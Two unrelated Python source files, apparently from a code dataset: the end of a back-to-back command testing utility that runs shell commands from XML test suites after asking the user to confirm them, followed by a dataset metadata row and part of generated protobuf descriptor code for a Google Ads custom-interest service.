if "N" in os.environ["B2BT_OPTIONS"]:
parameters["No colors"] = True
if "B2BT_DEBUG" in os.environ.keys():
logging.disable(logging.NOTSET)
logging.debug("process_environment_variables(): parameters:")
logging.debug(parameters)
################################################################################
def process_command_line():
"""Process command line options"""
# pylint: disable=C0103
global parameters
# pylint: enable=C0103
# option letters followed by : expect an argument
# same for option strings followed by =
character_options = "dfhkn:o:qst:vyN?"
string_options = [
"autoconfirm",
"debug",
"force",
"help",
"keep",
"newpath=",
"nocolors",
"origpath=",
"quiet",
"skip",
"timeout=",
"version",
]
try:
options, remaining_arguments = getopt.getopt(
sys.argv[1:], character_options, string_options
)
except getopt.GetoptError as error:
logging.critical("Syntax error: %s", error)
display_help()
sys.exit(1)
for option, argument in options:
if option == "--debug":
logging.disable(logging.NOTSET)
elif option in ("-f", "--force"):
parameters["Overwrite results"] = True
elif option in ("--help", "-?"):
display_help()
sys.exit(0)
elif option in ("-k", "--keep"):
parameters["Keep results"] = True
elif option in ("-n", "--newpath"):
if os.path.isdir(argument):
parameters["New command path"] = os.path.abspath(argument)
else:
logging.critical("-n|--newpath argument is not a path")
sys.exit(1)
elif option in ("-o", "--origpath"):
if os.path.isdir(argument):
parameters["Original command path"] = os.path.abspath(argument)
else:
logging.critical("-o|--origpath argument is not a path")
sys.exit(1)
elif option in ("-q", "--quiet"):
parameters["Quiet differences"] = True
elif option in ("-s", "--skip"):
parameters["Skip original command"] = True
elif option in ("-t", "--timeout"):
try:
parameters["Timeout"] = float(argument)
except ValueError:
logging.critical("-t|--timeout argument is not a (floating) number")
sys.exit(1)
if parameters["Timeout"] < MINIMUM_DEFAULT_TIMEOUT:
logging.critical(
"-t|--timeout argument must be >= %s seconds",
MINIMUM_DEFAULT_TIMEOUT,
)
sys.exit(1)
elif option == "--version":
print(ID.replace("@(" + "#)" + " $" + "Id" + ": ", "").replace(" $", ""))
sys.exit(0)
elif option in ("-y", "--autoconfirm"):
parameters["Auto confirm"] = True
elif option in ("-N", "--nocolors"):
parameters["No colors"] = True
logging.debug("process_command_line(): parameters:")
logging.debug(parameters)
logging.debug("process_command_line(): remaining_arguments:")
logging.debug(remaining_arguments)
return remaining_arguments
################################################################################
def is_privileged():
"""Return True if the utility is run with privileged accesses
or if we don't know"""
try:
return os.geteuid() == 0
except AttributeError:
# Happens when not running on a Unix operating system
# Assuming a Windows operating system:
try:
return ctypes.windll.shell32.IsUserAnAdmin() != 0
except:
# Happens when on some Windows version (XP) and other operating systems
# We return True when we don't know to stay on the safe side
return True
################################################################################
def get_tag_lines(xml_node, tag_name):
"""Return a list of non-blank stripped lines from an XML node"""
lines = []
tag_content = xml_node.getElementsByTagName(tag_name)
if tag_content:
nodelist = tag_content[0].childNodes
for node in nodelist:
if node.nodeType == node.TEXT_NODE:
for line in node.data.split(os.linesep):
if line.strip():
newline = line.strip()
# If line starts and ends with quotes, remove them
# but keep spaces inside:
if len(newline) >= 2 \
and newline[0] == '"' \
and newline[-1] == '"':
newline = newline[1:-1]
lines.append(newline)
return lines
################################################################################
def read_test_case(case):
"""Check and return the contents of a test case XML node"""
name = ""
if case.hasAttribute("name"):
name = case.getAttribute("name")
timeout = str(parameters["Timeout"])
if case.hasAttribute("timeout"):
timeout = case.getAttribute("timeout")
pre = get_tag_lines(case, "pre")
stdin = get_tag_lines(case, "stdin")
cmd = get_tag_lines(case, "cmd")
post = get_tag_lines(case, "post")
logging.debug("read_test_case(): name: %s", name)
logging.debug("read_test_case(): pre: ['%s']", "', '".join(pre))
logging.debug("read_test_case(): stdin: ['%s']", "', '".join(stdin))
logging.debug("read_test_case(): cmd: ['%s']", "', '".join(cmd))
logging.debug("read_test_case(): timeout: %s", timeout)
logging.debug("read_test_case(): post: ['%s']", "', '".join(post))
# Check the parameters:
try:
timeout_value = float(timeout)
except ValueError:
logging.critical(
'In test case "%s": the timeout argument is not a (floating) number', name
)
sys.exit(1)
if timeout_value <= 0:
logging.critical(
'In test case "%s": the timeout argument must be a positive number', name
)
sys.exit(1)
if len(cmd) == 0:
logging.critical('In test case "%s": a non empty cmd tag is mandatory', name)
sys.exit(1)
if len(cmd) > 1:
logging.error('In test case "%s": the cmd tag must be 1 line only', name)
sys.exit(1)
return name, pre, stdin, cmd[0], timeout_value, post
################################################################################
def get_file_size(file_path):
"""Return a file size in bytes"""
file_stats = os.stat(file_path)
return file_stats.st_size
################################################################################
def get_file_digest(file_path):
"""Return a file MD5 digest in hexadecimal"""
chunk_size = 512 * 200
digest = hashlib.md5()
with open(file_path, "rb") as file:
for chunk in iter(lambda: file.read(chunk_size), b""):
digest.update(chunk)
return digest.hexdigest()
################################################################################
def describe_test_environment(test_directory, command_full_path):
"""Generate a test 0 sub-directory with system information
Return the command MD5 digest"""
# Making the test directories and getting inside:
directory = test_directory + os.sep + "0"
if not os.path.isdir(directory):
try:
os.makedirs(directory)
except OSError as error:
logging.critical(
'Unable to create the "%s" directory: %s', directory, error
)
sys.exit(1)
os.chdir(directory)
with open("info", "w") as file:
file.write("System/nodename = {}{}".format(os.uname().nodename, os.linesep))
try:
username = getpass.getuser()
except:
username = ""
file.write("System/user = {}{}".format(username, os.linesep))
file.write("Hardware/machine = {}{}".format(platform.machine(), os.linesep))
file.write("Hardware/processor = {}{}".format(platform.processor(), os.linesep))
file.write("Hardware/cpus = {}{}".format(os.cpu_count(), os.linesep))
file.write(
"OperatingSystem/system = {}{}".format(platform.system(), os.linesep)
)
file.write(
"OperatingSystem/release = {}{}".format(platform.release(), os.linesep)
)
file.write("Environment/locale = {}{}".format(locale.getlocale(), os.linesep))
file.write(
"Python/implementation = {}{}".format(
platform.python_implementation(), os.linesep
)
)
file.write(
"Python/version = {}{}".format(platform.python_version(), os.linesep)
)
file.write("Command/path = {}{}".format(command_full_path, os.linesep))
file.write(
"Command/size = {}{}".format(get_file_size(command_full_path), os.linesep)
)
command_md5 = get_file_digest(command_full_path)
file.write("Command/md5 = {}{}".format(command_md5, os.linesep))
if shutil.which("what"):
results = subprocess.run(
["what", "-q", command_full_path],
text=True,
capture_output=True,
check=False,
)
file.write("Command/what = {}{}".format(results.stdout, os.linesep))
if shutil.which("ident"):
results = subprocess.run(
["ident", "-q", command_full_path],
text=True,
capture_output=True,
check=False,
)
file.write("Command/ident = {}{}".format(results.stdout, os.linesep))
os.chdir(os.pardir + os.sep + os.pardir)
return command_md5
################################################################################
def ask_for_confirmation(text, accepted):
"""Print the text and return True if user input is in the accepted list"""
answer = input(text)
return answer.lower() in accepted
################################################################################
def confirm_test(pre_commands, standard_input, command_line, post_commands):
"""Return True if a test is to be executed"""
print(" About to execute the following commands:")
if pre_commands:
print(" pre:")
for line in pre_commands:
print(" %s" % line)
if standard_input:
print(" stdin:")
for line in standard_input:
print(" %s" % line)
print(" cmd:")
print(" %s" % command_line)
if post_commands:
print(" post:")
for line in post_commands:
print(" %s" % line)
return ask_for_confirmation(" Please confirm execution (y[es]): ", ("y", "yes"))
################################################################################
def execute_test(
test_directory,
test_number,
pre_commands,
standard_input,
full_command_path,
command_line,
timeout,
post_commands,
):
"""Execute a test in a subdirectory"""
logging.debug("execute_test(): test_directory=%s", test_directory)
logging.debug("execute_test(): test_number=%s", str(test_number))
logging.debug("execute_test(): pre_commands=%s", " ".join(pre_commands))
logging.debug("execute_test(): standard_input=%s", " ".join(standard_input))
logging.debug("execute_test(): full_command_path=%s", full_command_path)
logging.debug("execute_test(): command_line=%s", command_line)
logging.debug("execute_test(): timeout=%d", timeout)
logging.debug("execute_test(): post_commands=%s", " ".join(post_commands))
# Making the test directories and getting inside:
directory = test_directory + os.sep + str(test_number) + os.sep + "tmp"
if not os.path.isdir(directory):
try:
os.makedirs(directory)
except OSError as error:
logging.critical(
'Unable to create the "%s" directory: %s', directory, error
)
sys.exit(1)
os.chdir(directory)
# Executing commands defined in the "pre" section:
for line in pre_commands:
pre_results = subprocess.run(line, shell=True, check=False)
if pre_results.returncode != 0:
logging.warning(
"Pre command '%s' returned %d", line, pre_results.returncode
)
# Inserting the full command path in the command line at the first command reference:
command_basename = os.path.basename(full_command_path)
command_dirname = os.path.dirname(full_command_path)
line = ""
if command_line.startswith(command_basename):
line = command_dirname + os.sep + command_line
elif " " + command_basename in command_line:
line = command_line.replace(
" " + command_basename, " " + command_dirname + os.sep + command_basename, 1
)
elif "\t" + command_basename in command_line:
line = command_line.replace(
"\t" + command_basename,
"\t" + command_dirname + os.sep + command_basename,
1,
)
elif ";" + command_basename in command_line:
line = command_line.replace(
";" + command_basename, ";" + command_dirname + os.sep + command_basename, 1
)
logging.debug("execute_test(): modified command_line=%s", line)
# Executing command defined in the "cmd" section, keeping results if requested:
if not timeout:
timeout = parameters["Timeout"]
start_time = time.time_ns()
try:
if standard_input:
one_line_input = os.linesep.join(standard_input) + os.linesep
results = subprocess.run(
line,
shell=True,
text=True,
input=one_line_input,
capture_output=True,
timeout=timeout,
check=False,
)
else:
results = subprocess.run(
line,
shell=True,
text=True,
capture_output=True,
timeout=timeout,
check=False,
)
except subprocess.TimeoutExpired as status:
standard_output = ""
if status.stdout:
standard_output = status.stdout.decode("utf-8")
standard_error_output = ""
if status.stderr:
standard_error_output = status.stderr.decode("utf-8")
results = subprocess.CompletedProcess(
status.cmd, 0, standard_output, standard_error_output
)
elapsed_time = time.time_ns() - start_time
logging.debug("execute_test(): results:")
logging.debug(results)
if parameters["Keep results"]:
with open(os.pardir + os.sep + "returncode", "w") as file:
file.write(str(results.returncode))
with open(os.pardir + os.sep + "stdout", "w") as file:
file.write(results.stdout)
with open(os.pardir + os.sep + "stderr", "w") as file:
file.write(results.stderr)
with open(os.pardir + os.sep + "time", "w") as file:
file.write(
"Elapsed time in s = {}{}".format(elapsed_time / 1000000000, os.linesep)
)
file.write("Load average = {}{}".format(os.getloadavg(), os.linesep))
# Executing commands defined in the "post" section and collecting their output:
post_output = ""
for line in post_commands:
post_results = subprocess.run(
line, shell=True, text=True, capture_output=True, check=False
)
if post_results.returncode != 0:
logging.warning(
"Post command '%s' returned %d", line, post_results.returncode
)
if post_results.stdout:
post_output = post_output + post_results.stdout
if parameters["Keep results"]:
with open(os.pardir + os.sep + "post", "w") as file:
file.write(post_output)
# Removing unneeded directories
if parameters["Keep results"]:
os.chdir(os.pardir)
shutil.rmtree("tmp")
os.chdir(os.pardir + os.sep + os.pardir)
else:
os.chdir(os.pardir + os.sep + os.pardir + os.sep + os.pardir)
shutil.rmtree(test_directory)
return results, post_output
################################################################################
def load_previous_results(test_directory, test_number):
"""Load results from a previous run
Return a CompletedProcess object and a text string"""
if not os.path.isdir(test_directory + os.sep + str(test_number)):
return None, ""
with open(
test_directory + os.sep + str(test_number) + os.sep + "returncode", "r"
) as file:
returncode = int(file.readline())
with open(
test_directory + os.sep + str(test_number) + os.sep + "stdout", "r"
) as file:
stdout = file.read()
with open(
test_directory + os.sep + str(test_number) + os.sep + "stderr", "r"
) as file:
stderr = file.read()
with open(
test_directory + os.sep + str(test_number) + os.sep + "post", "r"
) as file:
post = file.read()
return subprocess.CompletedProcess([], returncode, stdout, stderr), post
################################################################################
def color_print(text, color):
"""Print a text in color if possible"""
if COLORAMA and not parameters["No colors"]:
print(color + text + colorama.Style.RESET_ALL)
else:
print(text)
################################################################################
def compute_version(text):
"""Compute a version number from a version string"""
version_parts = text.split(".")
version = 0
try:
if len(version_parts) >= 1:
version = int(version_parts[0]) * 100 * 100
if len(version_parts) >= 2:
version += int(version_parts[1]) * 100
if len(version_parts) == 3:
version += int(version_parts[2])
except:
version = -1
return version
################################################################################
def verify_processor(attribute):
"""Verify if we use the correct program and version to process an XML file"""
processor = attribute.strip().split()
if processor[0] != "b2bt":
return False
if len(processor) == 1:
return True
if len(processor) > 2:
return False
version_requested = compute_version(processor[1])
current_version = compute_version(__version__)
if version_requested == -1 or current_version == -1:
return False
if version_requested > current_version:
return False
return True
################################################################################
def remind_command(same_command, command):
"""Print the command tested on the first difference encountered"""
if same_command:
same_command = False
if not parameters["Quiet differences"]:
print(" Command:")
print(" %s" % command)
return same_command
################################################################################
def main():
"""The program's main entry point"""
program_name = os.path.basename(sys.argv[0])
initialize_debugging(program_name)
process_environment_variables()
arguments = process_command_line()
if len(arguments) == 0:
logging.warning("Please specify at least 1 test file to process")
display_help()
sys.exit(0)
if is_privileged():
print("It's not recommended to run this utility as a privileged user")
print(
"and you should definitely avoid doing so when running unverified test suites!"
)
if not parameters["Auto confirm"]:
print(
"However you'll get the chance to review each command to be executed..."
)
if not ask_for_confirmation(
"Please confirm execution (y[es]): ", ("y", "yes")
):
print("Better safe than sorry!")
sys.exit(0)
for filename in arguments:
if not os.path.isfile(filename):
logging.error("'%s' is not a file name", filename)
else:
try:
test_file = defusedxml.minidom.parse(filename)
except:
logging.critical("XML file error")
sys.exit(1)
# Get the root element of the document:
test_suite = test_file.documentElement
# Get the name of the program we'll be testing:
program_tested = os.path.basename(filename).replace(".xml", "")
if test_suite.hasAttribute("program"):
program_tested = test_suite.getAttribute("program").strip()
color_print("Testing the '%s' command:" % program_tested, colorama.Style.BRIGHT)
# Get the processor required for this file and verify if it's OK:
if test_suite.hasAttribute("processor"):
if not verify_processor(test_suite.getAttribute("processor")):
logging.critical("This test file requires a different or more recent processor")
sys.exit(1)
# Determine if the original command will have to be executed:
execute_original_command = False
original_command_full_path = ""
if not parameters["Skip original command"]:
if (
not os.path.isdir(program_tested + ".orig")
or parameters["Overwrite results"]
):
execute_original_command = True
if parameters["Original command path"] == "":
original_command_full_path = shutil.which(program_tested)
else:
original_command_full_path = shutil.which(
program_tested, path=parameters["Original command path"]
)
if original_command_full_path is None:
logging.critical("Original command not found")
sys.exit(1)
else:
logging.debug(
"Original command found at: %s", original_command_full_path
)
# Determine if the new command will have to be executed:
execute_new_command = False
new_command_full_path = ""
if parameters["New command path"] != "":
if (
not os.path.isdir(program_tested + ".new")
or parameters["Overwrite results"]
):
execute_new_command = True
new_command_full_path = shutil.which(
program_tested, path=parameters["New command path"]
)
if new_command_full_path is None:
logging.critical("New command not found")
sys.exit(1)
else:
logging.debug("New command found at: %s", new_command_full_path)
# Get all the test cases in the test suite:
test_cases = test_suite.getElementsByTagName("test-case")
# If we are to keep results, note some system information
# for next time & place we'll make comparisons:
original_command_md5 = ""
new_command_md5 = ""
if parameters["Keep results"]:
if execute_original_command:
original_command_md5 = describe_test_environment(
program_tested + ".orig", original_command_full_path
)
if execute_new_command:
new_command_md5 = describe_test_environment(
program_tested + ".new", new_command_full_path
)
# But at the minimum check that we are not testing the same command:
else:
if execute_original_command:
original_command_md5 = get_file_digest(original_command_full_path)
if execute_new_command:
new_command_md5 = get_file_digest(new_command_full_path)
if original_command_md5 == new_command_md5:
logging.warning("The commands are the same! Disabling new command run")
execute_new_command = False
# Process each test case:
test_number = 0
skipped_count = 0
different_count = 0
same_count = 0
for test_case in test_cases:
test_name, pre, stdin, cmd, timeout, post = read_test_case(test_case)
test_number += 1
print(' Test #{} "{}"'.format(test_number, test_name))
# Confirm test execution (in case you are not the author of the test suite):
if not parameters["Auto confirm"]:
if not confirm_test(pre, stdin, cmd, post):
color_print(" Skipping test", colorama.Fore.YELLOW)
skipped_count += 1
continue
# Execute tests:
results1 = None
if execute_original_command:
results1, post_output1 = execute_test(
program_tested + ".orig",
test_number,
pre,
stdin,
original_command_full_path,
cmd,
timeout,
post,
)
elif not parameters["Skip original command"]:
results1, post_output1 = load_previous_results(
program_tested + ".orig", test_number
)
results2 = None
if execute_new_command:
results2, post_output2 = execute_test(
program_tested + ".new",
test_number,
pre,
stdin,
new_command_full_path,
cmd,
timeout,
post,
)
# Compare tests results:
if results1 and results2:
same = True
if results1.returncode != results2.returncode:
same = remind_command(same, cmd)
color_print(
" Return codes are different!",
colorama.Fore.RED + colorama.Style.BRIGHT,
)
if not parameters["Quiet differences"]:
print(" Original = {}".format(results1.returncode))
print(" New = {}".format(results2.returncode))
if results1.stdout != results2.stdout:
same = remind_command(same, cmd)
color_print(
" Standard output is different!",
colorama.Fore.RED + colorama.Style.BRIGHT,
)
if not parameters["Quiet differences"]:
diff = difflib.unified_diff(
str(results1.stdout).split(os.linesep),
str(results2.stdout).split(os.linesep),
fromfile="Original stdout",
tofile="New stdout",
)
for line in diff:
print(line)
if results1.stderr != results2.stderr:
same = remind_command(same, cmd)
color_print(
" Standard error output is different!",
colorama.Fore.RED + colorama.Style.BRIGHT,
)
if not parameters["Quiet differences"]:
diff = difflib.unified_diff(
str(results1.stderr).split(os.linesep),
str(results2.stderr).split(os.linesep),
fromfile="Original stderr",
tofile="New stderr",
)
for line in diff:
print(line)
if post_output1 != post_output2:
same = remind_command(same, cmd)
color_print(
" Post commands output is different!",
colorama.Fore.RED + colorama.Style.BRIGHT,
)
if not parameters["Quiet differences"]:
diff = difflib.unified_diff(
str(post_output1).split(os.linesep),
str(post_output2).split(os.linesep),
fromfile="Original post output",
tofile="New post output",
)
for line in diff:
print(line)
if same:
same_count += 1
color_print(" Same results", colorama.Fore.GREEN)
else:
different_count += 1
# Print test suite results:
if not parameters["Skip original command"] and execute_new_command:
color_print("Results:", colorama.Style.BRIGHT)
if different_count:
color_print(
" {} out of {} test cases have different results".format(
different_count, same_count + different_count
),
colorama.Style.BRIGHT,
)
else:
color_print(
" All {} test cases have the same results".format(same_count),
colorama.Fore.GREEN,
)
if skipped_count:
color_print(
" {} test cases skipped".format(skipped_count),
colorama.Fore.YELLOW,
)
sys.exit(0)
if __name__ == "__main__":
main()
| 38.050701
| 100
| 0.520398
|
025da87a83ee7760d2e4cfa4afa7ab3bd0da8391
| 18,330
|
py
|
Python
|
google/ads/google_ads/v6/proto/services/custom_interest_service_pb2.py
|
jphanwebstaurant/google-ads-python
|
600812b2afcc4d57f00b47dfe436620ce50bfe9b
|
[
"Apache-2.0"
] | 1
|
2021-04-09T04:28:47.000Z
|
2021-04-09T04:28:47.000Z
|
google/ads/google_ads/v6/proto/services/custom_interest_service_pb2.py
|
jphanwebstaurant/google-ads-python
|
600812b2afcc4d57f00b47dfe436620ce50bfe9b
|
[
"Apache-2.0"
] | null | null | null |
google/ads/google_ads/v6/proto/services/custom_interest_service_pb2.py
|
jphanwebstaurant/google-ads-python
|
600812b2afcc4d57f00b47dfe436620ce50bfe9b
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v6/proto/services/custom_interest_service.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.ads.google_ads.v6.proto.resources import custom_interest_pb2 as google_dot_ads_dot_googleads__v6_dot_proto_dot_resources_dot_custom__interest__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
from google.api import client_pb2 as google_dot_api_dot_client__pb2
from google.api import field_behavior_pb2 as google_dot_api_dot_field__behavior__pb2
from google.api import resource_pb2 as google_dot_api_dot_resource__pb2
from google.protobuf import field_mask_pb2 as google_dot_protobuf_dot_field__mask__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v6/proto/services/custom_interest_service.proto',
package='google.ads.googleads.v6.services',
syntax='proto3',
serialized_options=b'\n$com.google.ads.googleads.v6.servicesB\032CustomInterestServiceProtoP\001ZHgoogle.golang.org/genproto/googleapis/ads/googleads/v6/services;services\242\002\003GAA\252\002 Google.Ads.GoogleAds.V6.Services\312\002 Google\\Ads\\GoogleAds\\V6\\Services\352\002$Google::Ads::GoogleAds::V6::Services',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\nDgoogle/ads/googleads_v6/proto/services/custom_interest_service.proto\x12 google.ads.googleads.v6.services\x1a=google/ads/googleads_v6/proto/resources/custom_interest.proto\x1a\x1cgoogle/api/annotations.proto\x1a\x17google/api/client.proto\x1a\x1fgoogle/api/field_behavior.proto\x1a\x19google/api/resource.proto\x1a google/protobuf/field_mask.proto\"b\n\x18GetCustomInterestRequest\x12\x46\n\rresource_name\x18\x01 \x01(\tB/\xe0\x41\x02\xfa\x41)\n\'googleads.googleapis.com/CustomInterest\"\xa3\x01\n\x1cMutateCustomInterestsRequest\x12\x18\n\x0b\x63ustomer_id\x18\x01 \x01(\tB\x03\xe0\x41\x02\x12R\n\noperations\x18\x02 \x03(\x0b\x32\x39.google.ads.googleads.v6.services.CustomInterestOperationB\x03\xe0\x41\x02\x12\x15\n\rvalidate_only\x18\x04 \x01(\x08\"\xe1\x01\n\x17\x43ustomInterestOperation\x12/\n\x0bupdate_mask\x18\x04 \x01(\x0b\x32\x1a.google.protobuf.FieldMask\x12\x43\n\x06\x63reate\x18\x01 \x01(\x0b\x32\x31.google.ads.googleads.v6.resources.CustomInterestH\x00\x12\x43\n\x06update\x18\x02 \x01(\x0b\x32\x31.google.ads.googleads.v6.resources.CustomInterestH\x00\x42\x0b\n\toperation\"n\n\x1dMutateCustomInterestsResponse\x12M\n\x07results\x18\x02 \x03(\x0b\x32<.google.ads.googleads.v6.services.MutateCustomInterestResult\"3\n\x1aMutateCustomInterestResult\x12\x15\n\rresource_name\x18\x01 \x01(\t2\xf9\x03\n\x15\x43ustomInterestService\x12\xcd\x01\n\x11GetCustomInterest\x12:.google.ads.googleads.v6.services.GetCustomInterestRequest\x1a\x31.google.ads.googleads.v6.resources.CustomInterest\"I\x82\xd3\xe4\x93\x02\x33\x12\x31/v6/{resource_name=customers/*/customInterests/*}\xda\x41\rresource_name\x12\xf2\x01\n\x15MutateCustomInterests\x12>.google.ads.googleads.v6.services.MutateCustomInterestsRequest\x1a?.google.ads.googleads.v6.services.MutateCustomInterestsResponse\"X\x82\xd3\xe4\x93\x02\x39\"4/v6/customers/{customer_id=*}/customInterests:mutate:\x01*\xda\x41\x16\x63ustomer_id,operations\x1a\x1b\xca\x41\x18googleads.googleapis.comB\x81\x02\n$com.google.ads.googleads.v6.servicesB\x1a\x43ustomInterestServiceProtoP\x01ZHgoogle.golang.org/genproto/googleapis/ads/googleads/v6/services;services\xa2\x02\x03GAA\xaa\x02 Google.Ads.GoogleAds.V6.Services\xca\x02 Google\\Ads\\GoogleAds\\V6\\Services\xea\x02$Google::Ads::GoogleAds::V6::Servicesb\x06proto3'
,
dependencies=[google_dot_ads_dot_googleads__v6_dot_proto_dot_resources_dot_custom__interest__pb2.DESCRIPTOR,google_dot_api_dot_annotations__pb2.DESCRIPTOR,google_dot_api_dot_client__pb2.DESCRIPTOR,google_dot_api_dot_field__behavior__pb2.DESCRIPTOR,google_dot_api_dot_resource__pb2.DESCRIPTOR,google_dot_protobuf_dot_field__mask__pb2.DESCRIPTOR,])
_GETCUSTOMINTERESTREQUEST = _descriptor.Descriptor(
name='GetCustomInterestRequest',
full_name='google.ads.googleads.v6.services.GetCustomInterestRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='resource_name', full_name='google.ads.googleads.v6.services.GetCustomInterestRequest.resource_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\002\372A)\n\'googleads.googleapis.com/CustomInterest', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=318,
serialized_end=416,
)
_MUTATECUSTOMINTERESTSREQUEST = _descriptor.Descriptor(
name='MutateCustomInterestsRequest',
full_name='google.ads.googleads.v6.services.MutateCustomInterestsRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='customer_id', full_name='google.ads.googleads.v6.services.MutateCustomInterestsRequest.customer_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\002', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='operations', full_name='google.ads.googleads.v6.services.MutateCustomInterestsRequest.operations', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\002', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='validate_only', full_name='google.ads.googleads.v6.services.MutateCustomInterestsRequest.validate_only', index=2,
number=4, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=419,
serialized_end=582,
)
_CUSTOMINTERESTOPERATION = _descriptor.Descriptor(
name='CustomInterestOperation',
full_name='google.ads.googleads.v6.services.CustomInterestOperation',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='update_mask', full_name='google.ads.googleads.v6.services.CustomInterestOperation.update_mask', index=0,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='create', full_name='google.ads.googleads.v6.services.CustomInterestOperation.create', index=1,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='update', full_name='google.ads.googleads.v6.services.CustomInterestOperation.update', index=2,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='operation', full_name='google.ads.googleads.v6.services.CustomInterestOperation.operation',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=585,
serialized_end=810,
)
_MUTATECUSTOMINTERESTSRESPONSE = _descriptor.Descriptor(
name='MutateCustomInterestsResponse',
full_name='google.ads.googleads.v6.services.MutateCustomInterestsResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='results', full_name='google.ads.googleads.v6.services.MutateCustomInterestsResponse.results', index=0,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=812,
serialized_end=922,
)
_MUTATECUSTOMINTERESTRESULT = _descriptor.Descriptor(
name='MutateCustomInterestResult',
full_name='google.ads.googleads.v6.services.MutateCustomInterestResult',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='resource_name', full_name='google.ads.googleads.v6.services.MutateCustomInterestResult.resource_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=924,
serialized_end=975,
)
_MUTATECUSTOMINTERESTSREQUEST.fields_by_name['operations'].message_type = _CUSTOMINTERESTOPERATION
_CUSTOMINTERESTOPERATION.fields_by_name['update_mask'].message_type = google_dot_protobuf_dot_field__mask__pb2._FIELDMASK
_CUSTOMINTERESTOPERATION.fields_by_name['create'].message_type = google_dot_ads_dot_googleads__v6_dot_proto_dot_resources_dot_custom__interest__pb2._CUSTOMINTEREST
_CUSTOMINTERESTOPERATION.fields_by_name['update'].message_type = google_dot_ads_dot_googleads__v6_dot_proto_dot_resources_dot_custom__interest__pb2._CUSTOMINTEREST
_CUSTOMINTERESTOPERATION.oneofs_by_name['operation'].fields.append(
_CUSTOMINTERESTOPERATION.fields_by_name['create'])
_CUSTOMINTERESTOPERATION.fields_by_name['create'].containing_oneof = _CUSTOMINTERESTOPERATION.oneofs_by_name['operation']
_CUSTOMINTERESTOPERATION.oneofs_by_name['operation'].fields.append(
_CUSTOMINTERESTOPERATION.fields_by_name['update'])
_CUSTOMINTERESTOPERATION.fields_by_name['update'].containing_oneof = _CUSTOMINTERESTOPERATION.oneofs_by_name['operation']
_MUTATECUSTOMINTERESTSRESPONSE.fields_by_name['results'].message_type = _MUTATECUSTOMINTERESTRESULT
DESCRIPTOR.message_types_by_name['GetCustomInterestRequest'] = _GETCUSTOMINTERESTREQUEST
DESCRIPTOR.message_types_by_name['MutateCustomInterestsRequest'] = _MUTATECUSTOMINTERESTSREQUEST
